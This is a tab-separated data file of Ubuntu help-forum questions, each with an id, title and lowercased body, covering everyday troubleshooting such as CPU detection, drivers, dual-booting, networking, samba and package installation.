418488	macbook mid 2008 use both cpu cores/deactivate nolapic	i 'm quite new to this community so bare with me if i happen to do anything wrong . i 've got a problem with my macbook 5,2 ( mid 2008 ) running ubuntu 13.10 . it detects only one core , though the system runs on a dual-core . i could really use the additional power since i go to an it-school kinda thing and need to compile loads of code on this machine . i found this question : why is ubuntu detecting only one processor core ? . it tells there to deactivate nolapic . i 'm not quite sure how to do that . can you guys tell me how to do that ? i tried googling , but i was unable to find good results . thank you output of lscpu architecture : x86_64 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 1 on-line cpu ( s ) list : 0 thread ( s ) per core : 1 core ( s ) per socket : 1 socket ( s ) : 1 numa node ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 23 stepping : 10 cpu mhz : 2128.000 bogomips : 4256.00 virtualization : vt-x l1d cache : 32k l1i cache : 32k l2 cache : 3072k numa node0 cpu ( s ) : 0
418490	can i save my tweaks , themes , icons , customisation , softwares etc . like a backup and restore them if i do fresh install ?	i did a lot of work today and enhanced the look of my lubuntu 13.10 . i also installed a lot of packages , like numix icon theme from their ppa , downloaded icons and changed the taskbar color , size etc . now i want to save that all as a backup so that , if i have any errors , i can restore my customizations .
418493	setting wallpaper in gnome with command line only works once	i wrote a little python script , that downloads a random astronomy picture of the day and then sets it as the desktop wallpaper . when i was on ubuntu 13.10 with gnome installed this script used to work fine , and i had it change my background via cronjob every few hours and it worked well . however , now i have installed ubuntu gnome 13.10 and it behaves very strangely . the download works well , every time i run the script a new picture is being downloaded . however it only changes the wallpaper on the first time after a fresh start/ fresh log in . starting with the second execution there 's an ''animation '' on the desktop ( turning blueish ) but the wallpaper stays the same even though there 's a different picture saved in my wallpaper directory . when i log out and back in again , the new picture appears as the wallpaper . does anyone know what may cause it ? i 've found this and implemented it , but it changed nothing . also i think it is not related to crontab , because it also fails by manual execution . the command used to set the wallpaper is the following gsettings set org.gnome.desktop.background picture-uri file : ///path/to/file.jpg edit : the command above is the only relevant part , since executing it directly via terminal produces the same behavior .
418497	using xcfe4 to run apps requiring sudo user	total newb . i installed ubuntu 13.10 desktop to use as a server to play with on my home network . intended to use rdp from windows and found unity 3d made this impossible ( blank screen ) so i 've installed xcfe4 . however everytime i do something requiring sudo such as run software center it tells me i do n't have permission and does n't prompt for my sudo password . i can however run software center from cli as sudo . is there a way for xcfe4 to prompt me for my sudo password when using the gui or am i just taking the wrong approach altogether ?
418500	no sound in ubuntu 12.04 vm	i have ubuntu 12.04 ( 64-bit ) as my guest os in vmware 6 , running in windows 7 pro x64 . i have no sound . when i click on 'sound settings ' , there are only 2 options : analog stereo output and analog mono output . the driver that is installed at present ( if i 'm reading it right ) is es1371 [ audiopci-97 ] . my motherboard is an asrock z77 extreme6 , and it uses digital ( hd ) audio . what is the most common , or the most appropriate , digital stereo output driver that ubuntu uses , and where can i download it ?
418507	how to install global app menu in gnome-shell	i wanted to add a global menu ( libappmenu.so in ubuntu , the `` mac like menues on top panel '' ) in gnome-shell . there have been a couple of nice contributions on this direction years ago , but i could n't found anything for the latest version of gs ( 3.10+ ) . so , is there any way to integrate the global menu in gnome-shell 3.10 ? thanks !
418508	delete files of a type from a directory	i just deleted my $ home accidentally and used photorec to get back what it could recover . however it restored a lot of files . the backup is of multiple file types and contain more than 70,000 files . but i am interested only in certain file types . how can i delete/move the file types i do n't want . using nautilus is not an option as it slows down because of the number of files . how can i do this on shell ?
418513	usb error with no device connected	i 'm on ubuntu 13.10 , kernel 3.13.1 . the system boots , but displays message : usb 1-1.1 string 0 descriptor error : -22 after displaying the error , it 's color turns sometimes yellow , some times stays white with the resolution changing . it makes booting slow , much slower than before the message no usb device is connected at boot the problem started randomly one day , not after setup , not after kernel upgrade or updating anything the usb flash drives are `` the only thing i use '' which are working perfectly . keyboard / touchpad / camera / speakers / mic are working perfectly fine too . please help disable/fix this .
418519	samba shared printer	i attached a printer to a router usb port and configured the router as samba server . when tried to see the printer from ubuntu pc i could n't see the printer . i made several test changing workgroup , host name , ip address , ... , on the router , the printer is configured as : server name : sitecom workgroup : home administrator : admin password : xxx using ubuntu system adminstration - printer - i think i should configure a network printer , using windows samba option . browse command never find the printer , neither using the server 's ip-address nor the /workgroup/server name . i tried also by cups . logging to localhost:631 i tried to configure the printer , but did n't work . the odd thing is that the command `` find printer '' does n't find enything . from the other two windows pc the printer is ok .
418522	ssh- > scp connection without password prompt on every attempt	i would like to have a loop script run over two machines ( with global ip ) , in which during the loop i have several scp command for exchanging the outputs of those executions . do we have a way to avoid password prompt on every scps ? i.e. , generating keys for scp , etc
418526	nvidia geforce gt540m	i know there are a lot of topics about switchable ( intel/nvidia ) drivers and how to get both working with bumblebee , but i 'm a newbie with ubuntu installation , and i just ca n't get them working properly , i either end-up with a black-screen or ca n't use bumblebees option properly , i get some errors , so my question is : what are the step-by-steps starting from the bios settings , i want to install ubuntu 13.10 x64 on an acer aspire 5755g i7 second gen , 8gb ram , nvidia geforce gt540m , single bootable i think i 'm messing up with installing the drivers , maybe i 'm doing some stupid mistake , i would really appreciate a newbie friendly step-by-step guide for proper installation of the drivers , and bumblebee , i want to be able to run some programs or steam games with my dedicated card and run simple stuff on my intel graphics to save power and prevent overheating . thanks in advance .
418529	fail in installing google chrome in 12.04 both 32 & 64 bit	i have copied my terminal information can you help me with this problem ? mig @ ubuntu : ~ $ sudo dkg -- install /path/to/chrome.web [ sudo ] password for mig : sudo : dkg : command not found mig @ ubuntu : ~ $ sudo aåt-get install -f sudo : aåt-get : command not found mig @ ubuntu : ~ $ sudo apt-get install -f indlæser pakkelisterne ... færdig opbygger afhængighedstræ læser tilstandsoplysninger ... færdig e : pakken google-chrome-stable : i386 skal geninstalleres , men jeg kan ikke finde noget arkiv med den . mig @ ubuntu : ~ $ sudo dpkg -- install /path/to/chrome.deb dpkg : fejl under behandling af /path/to/chrome.deb ( -- install ) : kan ikke tilgå arkivet : no such file or directory der opstod fejl under behandlingen : /path/to/chrome.deb mig @ ubuntu : ~ $ sudo apt-get install libxss1 libnspr4-0d libcurl3 indlæser pakkelisterne ... færdig opbygger afhængighedstræ læser tilstandsoplysninger ... færdig e : pakken google-chrome-stable : i386 skal geninstalleres , men jeg kan ikke finde noget arkiv med den . mig @ ubuntu : ~ $ install google chrome install : can not stat `google ' : no such file or directory mig @ ubuntu : ~ $ dpkg -- install /to/chrome.deb dpkg : error : den ønskede handling kræver superbrugerrettigheder mig @ ubuntu : ~ $ gigimus gigimus : command not found mig @ ubuntu : ~ $ mark all the program 'mark ' can be found in the following packages : * mailutils-mh * nmh try : sudo apt-get install mig @ ubuntu : ~ $ sudo apt-get install indlæser pakkelisterne ... færdig opbygger afhængighedstræ læser tilstandsoplysninger ... færdig e : pakken google-chrome-stable : i386 skal geninstalleres , men jeg kan ikke finde noget arkiv med den . mig @ ubuntu : ~ $ sudo get-apt autoclean^c mig @ ubuntu : ~ $ ^c mig @ ubuntu : ~ $ ^c
418532	what 's ubuntu package for virtualgl-libs	i stumble upon an error while trying to run league of legends ( through playonlinux ) with optirun . i got these errors : error : ld.so : object 'libdlfaker.so ' from ld_preload can not be preloaded : ignored . error : ld.so : object 'librrfaker.so ' from ld_preload can not be preloaded : ignored . as stated in the doc , i try to check if the virtualgl-libs : i386 package is installed . however , it seems that this package does not exist anymore or its name has changed . i 'd like to know its new name , could you help me ? i 've found a package called virtualgl . but when i run sudo apt-get install virtualgl : i386 , it returns an error saying that ( approx translation from french ) : no version of the virtualgl : i386 package is available , but it exists in the database , this means that the package is missing , obsolete or only available through an other source . no version of the `` virtualgl : i386 '' package can be installed any idea or suggestion ?
418535	mv : can not move '/home ' to '/old_home ' : read-only filesystem	in 13.10 ( saucy ) , i followed the steps in both of these : https : //help.ubuntu.com/community/partitioning/home/moving mv : can not move `/home ' to `/old_home ' : device or resource busy but run into an error when i get to recovery mode . while running as root : ~ $ sudo su - ~ $ cd / / $ sudo mv /home /old_home mv : can not move '/home ' to '/old_home ' : read-only filesystem / $ chmod 777 /home chmod : changing permissions of '/home ' : read-only filesystem this also happens with and without sudo and sudo su - . at the top of the recovery menu , it states , `` recovery menu ( filesystem state : read-only ) '' . how can i safely backup /home while i migrate my home folder to a partition on another drive ? is there a better way ? i do n't know what i 'm missing , as i 've done this process before without these issues .
418536	wireshark does not start	i installed wireshark from the ubuntu software center ( running ubuntu version 13.10 ) and got no error messages after . the problem is that wireshark splash window closes halfway through the progress bar and then nothing more happens . i tried to uninstall/remove again and install using terminal and apt-get and again no error messages , but same thing happens . any idea what i can try or have done wrong ?
418537	overheating and windows 8 wo n't load	i 'm using an acer aspire v5-471 pg touch . specs : intel ( r ) core ( tm ) i5-3337u cpu @ 1.80ghz system bios v2.13 nvidia geforce gt nvidia optimus windows 8 pre-installed i installed ubuntu 13.10 on it and after running boot repair and restarting the computer this is what appeared on my grub menu : ubuntu advanced options for ubuntu windows uefi bkpbootmgfw.efi windows boot uefi loader efi/oem/boot/bootmgfw.efi windows bootmanager ( uefi on /dev/sda2 ) system setup http : //paste.ubuntu.com/6902654 i tried all the options but it will only display error : can not load image . booting using legacy bios and disabling secure boot , will show a screen operating system not found and some gray text on a black screen about some patent about intel ? ? ( not sure ) . and another thing , when i use ubuntu i ca n't adjust the brightness , my laptop overheats and consumes too much power . the battery gets drained after an hour . when i used windows 8 before i can use it up to 3 hours . so to sum it up i need help on 1 ) booting back to windows 2 ) repair overheating and power problems . i just started using ubuntu so i hope you could explain it simply .
418546	emacs screen drawing issues over ssh	i have a ubuntu 13.10 server installed in virtualbox on a windows host . when i connect to it via ssh ( tried putty , cygwin 's openssh and os x terminal from a different machine ) emacs appears to be having screen ( re ) drawing issues . here 's my test scenario : emacs ~/.bashrc c-s hist ( incremental search for `` hist '' ) keep hitting c-s ( aka jump to the next search result ) after repeating no . 3 a few times , i end up with this : the problem does n't occur when using virtualbox console . 12.04 works fine as well . tried the emacs23-nox package , the latest emacs from ppa : cassou/emacs , emacs -q ( skip start-up files ) , running it in a `` screen '' session , changing lc_all to c - all to no avail . any ideas what might be causing the issue ?
418548	recover data after updating windows 7	i used 2 os in my system - windows 7 , and fedora 20 . i have upgraded my window 7 in to 64 bit , after i have installed , i can not boot fedora 20 . i want to recover data which are stored in fedora , can you help me ? ?
418549	how to know which ubuntu i 'm booting on	i have used clonezilla to clone my ubuntu partition to another partition of the same hdd . now i have noticed that i have two ubuntu in the grub menu . how can get only one ubuntu in the grub menu ? or how to know the original ubuntu and the cloned one so i wo n't boot in the cloned one ? thanks .
418551	formatting hard drive from ext4 to ntfs	i currently have ubuntu 12.04 installed on my computer , but i wa n't to change back to windows 7 , but when i tried to install windows 7 via a dvd/cd , it could n't install on any of my hard drives . this is mainly because my hard drive 's file system is `` ext4 '' and not `` ntfs . '' also i have tried to format the drive , but it shows up with an error stating that my hard drive is `` busy . ''
418553	ca n't install kubuntu in uefi windows 8 preinstalled laptop	i know this problem has been raised several times , but i have spent nearly four days , but i could n't solve my problem . i just bought a sony laptop that came preinstalled with windows 8 with these specs : i5 cpu/4gb ram/500gb hdd/1gb nvidia geforce 740m graphics . i installed ubuntu successfully in uefi mode and secure boot disabled alongside windows , but i did n't get any grub bootloader . the problem was not solved even by boot-repair . then i tried kubuntu , but this one was n't even booting from the flash drive in uefi mode and i was was compelled to change the mode to legacy which subsequently helped , but the same grub problem persists . the mode has to be changed to legacy from boot setup each time i require to boot kubuntu/ubuntu and back to uefi to boot windows .
418556	c & c on xubuntu using wine/playonlinux	i have xubuntu 12.04 running on my notebook . one thing i would like to have working is c & c , the modded version from cncnet.org . i found these websites but all i try , it simply does not work for me . http : //funkyfr3sh.cncnet.org/playonmac_playonlinux/ i have saved 1 error report : https : //www.dropbox.com/s/zemjzgpi2vg64yq/backtrace % 20wine % 2020140209.txt i don have a clue what is going wrong and how i can solve this .
418557	ubuntu touch for xcover 2	is there a way to install ubuntu on samsung galaxy xcover 2 gt-s7710 ? i have checked https : //wiki.ubuntu.com/touch/devices and galaxy is n't there . i wonder if there is way to install galaxy s2 or s3 image .
418558	ubuntu going through disk check on boot every time	how can i turn this off ? ubuntu 13.04 is going through a disk check every time i boot becuse of a pid error can i turn this off ?
418561	is there a way to make thunar display `` recursive '' file size ?	i 'm using thunar 1.6.3 and currently when i 'm looking at a bunch of folders it looks something like this : folder 1 8,2 kb folder 2 4,1 kb folder 3 4,1 kb folder 4 0 kb i 'm not sure where these `` size '' numbers come from , but i 'm sure they do not reflect the actual size of everything in the folders , because when i right click and choose `` properties '' the folders ( all of them only kilobytes in size ) add up to over 100 gb . questions why does thunar , just like the command line on both 12.04 and 14.04 , show folder sizes like 4k ? what does this number mean ? is there a way to instead show compound size , that is the calculated recursive size of the folder and all contents , in the terminal , thunar or any other file manager ? ( nb : i 'm not looking for a shell script solution ) .
418562	ubuntu 12.04 samsung hd204ui spin-up-time fail after suspend	samsung 's hd204ui 2 tbyte ecodrives are known for their slow spin-up-time , so i did n't really wonder about a recent smart failure , after suspend , in the spin-up-time category . now there is a returning massage occurring , that , a drive failure is imminent coming from the gnome-drives-utility . its really getting annoying cause its popping up like 20 to 30 times a day and every time i have to click it and get rid of it . all other smart checks are fine and crystaldiskmanager in windows also reports the drive is fine except for the bad spin-up-time , which passed the threshold in the past . is there any way to disable this imminent failure massage ? also i noticed that this slow-spin-up-problem always occurs after suspend not during a cold-boot . i had a synology ds211 nas before and they specifically patched their system for this slow-spin-up times . maybe their is a solution out their to do the same for ubuntu but did n't find one until now .
418567	ubuntu server 10.04 will not connect to the internet	i created an dd image from a virtualbox with ubuntu server 10.04 on it . then i placed that image on a fresh empty ssd . my internet was working just fine on that virtualbox but on the ssd it doesnt connect to my ethernet cable . the pc with the ssd is connected to internet and i can do anything on it using a bootable cd . ifconfig shows only local loopback ifconfig -a shows also eth1 but no eth0 any solutions ?
418570	how to add a recently used entry in dolphin in xubuntu 12.04 ?	the 'recently used ' folder entry appears in the file dialog , but not in the file manager ( dolphin ) bookmark panel . how to add it ?
418572	unable to update ubuntu ... .while updating it shows as below	gnu @ gnu-lenovo-g560 : ~ $ sudo apt-get update ign cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty release.gpg ign cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty release ign cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty/main translationindex ign cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty/restricted translationindex err cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty/main amd64 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty/restricted amd64 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty/main i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty/restricted i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms ign cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty/main translation-en_in ign cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty/main translation-en ign cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty/restricted translation-en_in ign cdrom : //ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) natty/restricted translation-en 44 % [ connecting to iitk.ac.in ( 172.31.1.212 ) ] [ connecting to iitk.ac.in ( 172.31.1.212 ) ] [ connecting to iitk.ac.in ( 172.31.1.212 ) ] [ connecting to iitk .
418574	editing system partition	there is only one partition in my hard disk . i want to give a partiton on it . is there any way to resize it without using any live cd ?
418578	how do i install windows alonside ubuntu 12.04 ?	i quit using microsoft software years ago , but need to be able to also run windows software occasionally ( car navigation device software , phone sync software , etc . ) how do i go about it ?
418580	dvdmovie backup	i try to make backups of my dvd-movies.my plan was to record them with vlc media player but for some reasons there are many bugs in it . i do not want to copy them completely because it takes to much storage , i would prefer to record them so that i have a `` simple '' video on my hdd . but all programs i tryed only recorded the sound of the microphone so it recorded me eating biscuits and not the actors talking : ) it would be perfect if you know a programm to record the screen and the sound of the speakers and makes the produced video to need as less storage as possible . does anyone know such a programm or does anyone have another idea ? thank you , annonym
418583	ubuntu 13.10 why does n't any usb connections work properly ?	i have assembled 3 ubuntu os 's to date . 13.10 is my fourth and no usb connections work properly on it . keyboard and mouse are detected when i try to install from usb flash . once i get to the gnome desktop , neither keyboard or mouse will work . on a laptop there is use of touchpad until i log out and the log into the gnome flasback desktop where only keyboard of laptop works . main concern is pc which with all kinds of utilities for usb 's that nothing seems to function for usb whatsoever ! mouse is logitech m570 and keyboard is logitech 750 . both function properly on 13.04 which also uses gnome desktop but is 3.8 and not 3.10
418584	installing ubuntu 13.10 latest problem	i have 4 partition drive c , drive d , drive u , drive e in my hard drive then i installed ubuntu 13.10 on drive e which is empty .during the installation i use something else option..i make drive u : ext4 and i make drive e swap . then i click installed..after installing i ca n't find the two drives ? help me please..
418590	installation ubuntu 12.04 alongside mavericks	after a first attempt to post i am trying again . i want to install ubuntu 12.04 on my macbook pro running yet mavericks . as my super drive is defaulting i use a bootable usb stick . at least i found 3 methods and threads to do so . at this time what i did is installing refit ( after installing refind ) , so i am able to select the boot disk at the very beginning of start-up . i have created the bootable usb using unetbootin . so now i am able to see the pinguin at the very right of the screen when i turn my laptop on . i select it and it leads me to a blue square inside a black one with `` default '' as only option . i select at it gives me this image ! from there nothing happens so far . the laptop begins to overheat and i have to force a shutdown . meanwhile i moved forward as in the beginning i was not able to boot from the usb stick ( i can not see the pinguin when i turned my laptop on ) thanks for your help
418591	ca n't add new wireless network	awhile back , i switched internet plans and got a new router . since then , i can not connect to the new network with my dell laptop running ubuntu 12.04 precise pangolin . i believe connecting to a new wireless network should be as easy as clicking the wireless drop down menu at the top right , and then clicking the network id . when i do this , nothing ( literally , nothing ) happens . when i go down to 'edit connections ' and try to add a new wireless network , all the options are greyed out . i ca n't enter or click anything . i have no problems whatsoever connecting and using other wireless networks which i previously added with no trouble at all . i thought this may be a permissions thing ( somehow ) , since i have recently tried out some different window managers , and just recently re-installed unity . i attempted to set up a new connection from the command line , following the instructions from here , but this did n't work ( even though none of the commands returned an error ) . i 'm not familiar enough with any of these utilities and their output to know what the problem is . i was stuck following the instructions like a recipe ; not a good situation . i ran dmesg through grep searching for the interface name , and got several of these : addrconf ( netdev_up ) : wlan0 : link is not ready since i did all this , i have connected successfully to other wireless networks . there are numerous other wireless devices on the my home network , and there is no trouble with connecting with any of them . i would much appreciate some help with this problem !
418592	problem while installing virtual box	i 'm trying to install virtualbox-4.3 from software centre . but here showing an error message like this .
418597	black screen on hp pavilion zd7000	i 'm trying to install ubuntu on an old hp pavilion zd7000 . it has a pentium 4 | 2.8ghz | only 512 of ram . the installation appeared to work fine , i can boot to a login screen but after entering my credentials it goes to a black screen with the mouse and completely unresponsive . the video card is an old nvidia with 64mb of memory . i suspect that it might be a driver issue but i 'm relatively new to ubuntu , so i 'm asking the questions . thank you all for your time and attention with this matter it is appreciated .
418599	keyring passwords	my laptop has a login password , but to the best of my knowledge i never set up a keyring password and all worked ok until today when ubuntu asked for a keyring password . during setup i entered a password , which i think should have been a user id , so another message box came up asking for a password . i entered and confirmed my password . but it did not work . i tried again using a different id and input a new password , but it did not work either . now i ca n't access the laptop . how do i get rid of the existing data and start anew ? i just realized i am suddenly being asked for keyring passwords because i just upgraded to ubuntu 13.10 . does keyring require my login password and then set a new password ?
418600	multiple monitors : monitor not turning on	i 'm having trouble configuring my laptop display with the external monitor . i use the laptop most at home where i connect it to an external monitor and turn the display off . however i still need to use it `` unplugged '' or use both monitors from time to time . problem 1 : when i unplug the monitor the laptop display does n't turn on automatically . even i boot the laptop with monitor unplugged it turns itself off after login if i have used it with monitor last time . problem 2 : is there any shortcut for easily switching between `` mirrored '' display , extended display and turning display on and off ( like winkey+p on windows ? ) i have an intel hd graphics 4000 video card and use gnome-shell .
418601	how to uninstall the vi text editor preinstalled in ubuntu ?	i would like to uninstall the vi text editor which is pre-installed in ubuntu . how would i achieve that ?
418602	unable to get ubuntu 12.04 lts precise to recognize android lg motion 4g ms770	i sure have stepped into unknown territories . i got very disgusted with ms because they are doing away with xp , one of their better os 's imo . in return i installed ubuntu 12.04 lts and i am finding it to be quite a challenge . i 'm loving it btw . anyhow , i am having problems getting my lg motion to be recognized on ubuntu . i have tried a few methods by looking at old posts with no success . i really like to transfer some files back and forth . any help would be greatly appreciated ! here is my computer info : distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise dennyb @ dennyb-hp-compaq-nx7400-rb530ut-aba : ~ $
418604	getting an error when using 'make ' command when setup dahdi	i want to install dahdi , to installing asterisk . i am start by sudo apt-get install linux-headers-`uname -r` $ cd ~/src/asterisk-complete/ $ mkdir dahdi $ cd dahdi/ $ svn co http : //svn.asterisk.org/svn/dahdi/linux-complete/tags/2.6.1+2.6.1 $ cd 2.6.1+2.6.1 $ make $ sudo make install $ sudo make config i get error when use $ make
418607	dual monitor setup : grub loader goes to hdtv even if it is turned off	i 'm sorry if this is a repeat but i ca n't find the answer to this anywhere . i have a dual boot system with windows 7 and ubuntu 12.04 . i recently bought an hdtv and connected it to my computer by hdmi . i have it set up so it mirrors my primary monitor . the grub boot-loader no longer shows up on my primary display . the motherboard splash-screen shows up on both displays , then the primary goes blank and the grub-loader pops up on the hdtv . once i have selected what to boot , my primary blinks back on and everything is fine . my problem is i do n't want to have to turn on my hdtv every time i boot up my computer . thanks in advance !
418608	make screen turn blank ( no standby ) when closing laptop lid	i 'm trying to make the screen go off when i close the laptop lid , but the laptop should remain on ( no standby ) . i have ubuntu server 13.10 , with the xubuntu-desktop package installed for convenience ( but not meant to run all the time ) . currently it does nothing ( with or without gui ) , although the xfce4-power-manager marks that it would lock the screen . ( does the gui needs to be on for the settings in the power manager to have effect ? ) . there is also no option in the power manager to only turn the screen off . the switch in the laptop screen does work because it is able to get the system out of standby when i manually suspend it . ( some additional info : i 'm aware of logind.conf of systemd : everything is commented there , and if i understood correctly the handlelidswitch= option does not offer a way to get the screen only blank . the graphics card is an integrated intel one : 82852/855gm . )
418609	ethernet is not working on ubuntu 12.04	ok i 'm am very new to ubuntu . i just installed it a few days ago but the ethernet never worked . ubuntu is able to see that a ethernet cable is plugged in but cant connect to it . any help i will take .
418611	switch to ubuntu from windows xp	i am currently using windows xp on my laptop . i 'm thinking of trying ubuntu but if i do n't like it , how hard is it to switch back ? all the tech lingo is very confusing . can i switch back and forth from windows to ubuntu ? thanks .
418612	allocate each workspace to each monitor	i have 2 monitors - 1 is my laptop 's and 1 that i use as second ( but if this works , i would like to extend that to 4 monitors ) and i would like to have each workspace in each monitor . the idea is to have in my laptop the working workspace and in the rest the others , then i can switch using the 'workspace switcher ' easily to have in my laptop 's screen the workspace i wish . also , i need to easily drop apps to each workspace using the crtl+alt- keys . i have the second monitor working but it 's just a stretched extension of my current workspace . any suggestions with step-by-step solution ? i know this has been answered before , but all posts are more than 3 years old and the solutions are not perfectly working in current version . note : i have ubuntu 13.10 .
418615	syntax highlighting not working in vim ?	can someone help me out . i recently installed vim for c development and would like to get the syntax highlighting on . i 've tried various commands including `` syntax on '' but none seem to be working . i have gotten a .vimrc file online but do not know where to go from there . i 'm just using the basic vimrc file . http : //pastebin.com/tebisumu
418620	why does tar complaint that it can not find the file while extracting the archive ?	i uninstalled xampp and tried to reinstall it but when trying to extract it to the /opt directory , i get the following error : $ sudo tar -xzf xampp-linux-1.8.3-2-installer.run.tar.gz -c /opt tar ( child ) : xampp-linux-1.8.3-2-installer.run.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now . why does tar complaint that it can not find the file while extracting the archive ?
418623	error message `` mailing to remote domains not supported '' in mutt how to fix	how can i set up any command line mail agent to deliver to gmail accounts ?
418632	visit : command not found	i just installed `` visit '' , a scientific visualization software , on ubuntu 12.04 using the commands given in the visit install notes for unix given here . to be precise , my commands were entered from the directory i installed the .tar file and the install script ( /usr/downloads ) , and were chmod 755 visit-install2_7_1 ./visit-install2_7_1 2.7.1 linux-x86_64-ubuntu11 ../documents/visit cd echo `` set path = ( $ path /documents/visit/bin ) '' > > .cshrc now , when i enter the command `` visit '' in the cli it produces the error `` visit : command not found '' . i 'm not exactly a linux guru , so what is the general fix for something like this ? if you 'll notice in the commands above , the search path is set ( i 'm not really sure what this is ) ; could this be the source of the problem ? i am only able to open the software by cd'ing to the visit/bin directory and running ./visit , which i do n't think should be necessary .
418633	mysql died and wo n't start	i am working on ubuntu 12.10 server with nginx , mysql and unicorn installed . there is something wrong with mysql and has stopped working . log message from /var/log/mysql/error.log attempting backtrace . you can use the following information to find out where mysqld died . if you see no messages after this , something went terribly wrong ... stack_bottom = 0 thread_stack 0x30000 mysqld ( my_print_stacktrace+0x33 ) [ 0xb725de53 ] mysqld ( handle_fatal_signal+0x48c ) [ 0xb710255c ] [ 0xb6dd0400 ] mysqld ( +0x5e4d72 ) [ 0xb73d7d72 ] mysqld ( +0x5cfc3b ) [ 0xb73c2c3b ] mysqld ( +0x5d15ba ) [ 0xb73c45ba ] mysqld ( +0x57107d ) [ 0xb736407d ] mysqld ( +0x59aa9d ) [ 0xb738da9d ] mysqld ( +0x52b0b0 ) [ 0xb731e0b0 ] /lib/i386-linux-gnu/libpthread.so.0 ( +0x6d4c ) [ 0xb6db2d4c ] /lib/i386-linux-gnu/libc.so.6 ( clone+0x5e ) [ 0xb6b56d3e ] any help is appreciated , thanks in advance : )
418635	how to open applications after booting a purely command line interface ?	after booting linux in purely command line mode how can i open an application eg web browser or libre office ? for example if i use the command `` play '' with any audio file it starts to play it . i want to know commands for other applications .
418636	how to manage livecd collaboration in git	im trying to create a git repository that will hold an ubuntu livecd image so all my team can collaborate but ive hit a rough patch ... if i create the repository from an open ( unsquashed ) image , when someone checks out the image it doesnt work . if the image is closed ( squashed ) we cant manage changes of particular files . any thoughts ? thanks
418637	mounting usb-drive via virtual box	recently i 've installed virtual box and installed windows 8 on it on my ubuntu 12.04 . the problem is when i insert usb drive , ubuntu can recognize it , but virtual box ( windows 8 ) can n't ! what can i do for mounting usb drive on virtual box ( windows 8 ) ?
418638	removing ubuntu 13.10 , and reinstalling windows 7 , but windows7 dvd is unable to boot	i am new to ubuntu - i installed it by removing windows 7 . but i am unable to use it as easily as windows 7 , so , i want to remove ubuntu and reinstall win7 . i tried to install win 7 by dvd , but when i put dvd into the drive and changed the boot sequence to dvd drive and restarted the system , windows does not load - instead it goes blank for a while , and then ubuntu is loading . can any one help me to reinstall win7 by removing ubuntu . ( the dvd of win7 is working , but it was unable to boot in ubuntu ) . thanks in advance .
418641	nice way to manage multiple ubuntu servers	i need to manage 10+ ubuntu 12.04 servers running both inside a company network and on the internet . i am looking for an easy way to keep all boxes updated with the latest packages ( without autoupdates ) , but do n't want to use landscape . some `` easy to use '' interface would be nice . is there a tool i missed , while googling ?
418643	can not access ubuntu from windows	i can not access my ubuntu shared folders and i can not ping it too ( from windows ) . in ubuntu , i have smbd and nmbd services started . the ubuntu machine can be seen in the windows network directory . the router 's dhcp table can see the ip of both machines . i am not using any virtualization , these are two different machines . i can ping the ip of the windows machine and access its shared directories from the ubuntu . there are no firewalls on both machines . here is the result of ifconfig . eth1 is the wireless lan . i think it is suppposed to be wlan0 but that is what appeared after installation . here is the smb.conf file http : //pastebin.com/fd5sag59 at the bottom of smb.conf is the shared directory . here are the routes here is the screenshot of the ipconfig in windows update : i modified my smb.conf it still did n't work http : //pastebin.com/emusm2dy
418647	ubuntu phone development , where to start ?	i 'm a long time ubuntu desktop user , but new to the development world . i 'd like to start getting myself familiar with ubuntu touch and learn how to develop apps for it , however i 'm a little bit lost on where to start . can someone point me in the right direction ? also , do i need to get myself a device like the nexus 4 , or is sufficient to use an emulator ? thanks
418648	how to use sane to scan a document 1:1	the simplest job in the world - scan a black-and-white legal document ( us portrait size ) . the only goal is that the scanned document is 1:1 , meaning the same size and location on the page . i 'm using gimp , xsane , and an lide 210 scanner . if i choose `` letter port . '' ( meaning , i hope , us letter portrait ) in the xsane preview window , the scanned document is smaller and offset to the right side . if i choose `` full size '' and crop to us portrait size , the top line of the document is clipped . is there some combination of software that actually works ? ( along the way , i must admit that xsane is one of the flukiest interfaces i 've recently come across - i love the the way previewing the document changes the scan size , gamma , brightness , and contrast ... )
418649	cant install ubuntu 12.04.4 on lenovo t61 nvidia quadro nvs 140m	i have problem with my laptop and ubuntu 12.04.4 . i want install this os on my lenovo thinkpad t61 with nvidia quadro nvs 140m but i cant because screen is crashed . the pictures is what i see when i turn on live mode :
418652	audio playback problem in ubuntu 13.10	i have installed ubuntu 13.04 and successfully upgraded it to ubuntu 13.10 the problem that i am facing from the begining is that whenever i play any mp3 file in vlc or rhythmbox it gets little sticky while playing . its not smooth as it getting stuck for fraction of seconds after 5-6 sec of interval.how can i fix this . i have now ubuntu 13.10 gnome.so far i have done is sudo apt-get -- purge remove linux-sound-base alsa-base alsa-utils and again reinstalled it sudo apt-get install linux-sound-base alsa-base alsa-utilsd sudo apt-get install ubuntu-restricted-extras and other tweaks , but no joy . and how to start synaptic package manager in gnome based ?
